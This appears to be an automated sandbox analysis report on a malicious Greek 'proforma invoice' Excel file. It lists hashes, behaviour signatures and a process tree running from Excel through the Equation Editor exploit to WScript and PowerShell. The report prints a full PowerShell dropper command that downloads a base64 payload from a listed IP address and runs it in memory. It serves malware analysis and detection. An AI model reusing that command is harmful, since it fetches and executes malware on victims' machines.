Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    23-11-2022 12:13

General

  • Target

    ΠΡΟΦΟΡΜΑ ΤΙΜΟΛΟΓΙΟ- 47584.xlsx

  • Size

    755KB

  • MD5

    05b22b58303ffdf7c74de397fb188836

  • SHA1

    e4ad512d6d1083d758b14926bc380c048f429e9e

  • SHA256

    b56e2d3d736380f33f32ab158309146a318c41039119abd4b64c45c57f3078e9

  • SHA512

    763ad24cfa53fa7435f9426ad0949b837d5cb5eefaed5a6ba4be09e279f96a8d6bac11b511a649f3280ded13c02043b7abe13bc51f88bc3c5af2b8d5a66cbd0c

  • SSDEEP

    12288:IROo3SiPbBAFZz+yioSnTP62VdZSQZL7tjibfVbzHZD9veF8J7nMmPqcs+ACXzbE:I4onPbBAFliFPr3jiLxHTvzccKCXzbzg

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://4.204.233.44/DLL/NoStartUp.ppam

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\ΠΡΟΦΟΡΜΑ ΤΙΜΟΛΟΓΙΟ- 47584.xlsx"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:580
  • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    1⤵
    • Blocklisted process makes network request
    • Launches Equation Editor
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\vbs tuesday.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.hasjdgfsgfagfjhasdfsjah/42.021.871.591//:ptth'))
        3⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:432

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\vbs tuesday.vbs

    Filesize

    208KB

    MD5

    fff2ba02c53b34effc52c05238a57c89

    SHA1

    fdc77086e5ecbf9db1a3dbac8ea0a7c55d77940e

    SHA256

    e775e86df1cacbb5baef5fb865140d28b64b3c17b3fa6aa503596d65d98ca329

    SHA512

    054d07ef65fd904beb993ad79816f09e6095df0156fb1f777fde3e10425e3c379f35ec631a144f7211329d90e6f17cf657ba7814a75ac987effd63f893b96dc5

  • memory/432-67-0x000000006CB60000-0x000000006D10B000-memory.dmp

    Filesize

    5.7MB

  • memory/432-66-0x000000006CB60000-0x000000006D10B000-memory.dmp

    Filesize

    5.7MB

  • memory/432-64-0x0000000000000000-mapping.dmp

  • memory/580-57-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/580-59-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/580-58-0x00000000767D1000-0x00000000767D3000-memory.dmp

    Filesize

    8KB

  • memory/580-54-0x000000002FDB1000-0x000000002FDB4000-memory.dmp

    Filesize

    12KB

  • memory/580-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/580-55-0x0000000071C11000-0x0000000071C13000-memory.dmp

    Filesize

    8KB

  • memory/580-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/580-69-0x0000000072BFD000-0x0000000072C08000-memory.dmp

    Filesize

    44KB

  • memory/1032-61-0x0000000000000000-mapping.dmp